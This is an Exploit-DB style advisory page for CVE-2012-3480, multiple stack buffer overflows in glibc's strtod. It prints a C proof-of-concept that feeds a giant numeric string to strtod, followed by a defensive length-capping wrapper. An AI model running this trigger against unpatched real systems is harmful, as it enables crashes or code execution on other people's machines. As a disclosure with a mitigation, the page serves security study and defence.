Exploit GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities

Exploiter

18 Dec 2022
EDB-ID: 37631
EDB Verified: Passed
Author: JOSEPH S. MYER
Vulnerability type: LOCAL
Platform: LINUX
CVE: CVE-2012-3480
Publication date: 2012-08-13
C:
/*
 * source: https://www.securityfocus.com/bid/54982/info
 *
 * GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities
 * because it fails to perform adequate boundary checks on user-supplied data.
 *
 * Local attackers can exploit these issues to run arbitrary code with
 * privileges of the affected application. Failed exploit attempts can result
 * in a denial-of-service condition.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EXPONENT "e-2147483649"
#define SIZE 214748364
int
main (void)
{
  /* Room for '1', SIZE '0' digits and EXPONENT (sizeof counts its NUL).  */
  char *p = malloc (1 + SIZE + sizeof (EXPONENT));
  if (p == NULL)
    {
      perror ("malloc");
      exit (EXIT_FAILURE);
    }
  /* Build the decimal string "1000...0e-2147483649".  */
  p[0] = '1';
  memset (p + 1, '0', SIZE);
  memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT));
  /* Parse it with strtod and print the result in hex-float form.  */
  double d = strtod (p, NULL);
  printf ("%a\n", d);
  exit (EXIT_SUCCESS);
}
 
Source
www.exploit-db.com
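The test case above hands strtod a digit string more than 200 million characters long, so a caller that parses untrusted numbers can refuse oversized input before it reaches the library. The wrapper below is an added example, not code from the advisory, Exploit-DB or glibc; the names `bounded_strtod` and `make_long_literal` and the 4096-byte cap are assumptions chosen for illustration.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Assumed cap: generous for any real decimal literal, tiny next to the
   SIZE-digit string built by the test case on this page. */
#define MAX_NUMERIC_LEN 4096

/* Parse s as a double. Returns 0 and stores the value in *out, or -1 if
   the input is oversized, malformed or out of range. */
int
bounded_strtod (const char *s, double *out)
{
  char *end;
  double v;

  if (s == NULL || out == NULL)
    return -1;
  /* memchr stops at the first NUL, so at most MAX_NUMERIC_LEN + 1 bytes
     are examined and an oversized string never reaches strtod. */
  if (memchr (s, '\0', MAX_NUMERIC_LEN + 1) == NULL)
    return -1;
  errno = 0;
  v = strtod (s, &end);
  if (end == s || *end != '\0')   /* nothing parsed, or trailing bytes */
    return -1;
  if (errno == ERANGE)            /* overflow or underflow */
    return -1;
  *out = v;
  return 0;
}

/* Constructed sample input: '1', n '0' digits, then exponent.
   Returns a malloc'd string the caller frees, or NULL. */
char *
make_long_literal (size_t n, const char *exponent)
{
  size_t elen = strlen (exponent);
  char *p = malloc (1 + n + elen + 1);

  if (p == NULL)
    return NULL;
  p[0] = '1';
  memset (p + 1, '0', n);
  memcpy (p + 1 + n, exponent, elen + 1);
  return p;
}
```

A length cap at the call site is defence in depth for code that cannot control which libc it runs on; it does not replace installing a glibc build that contains the fix for CVE-2012-3480.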
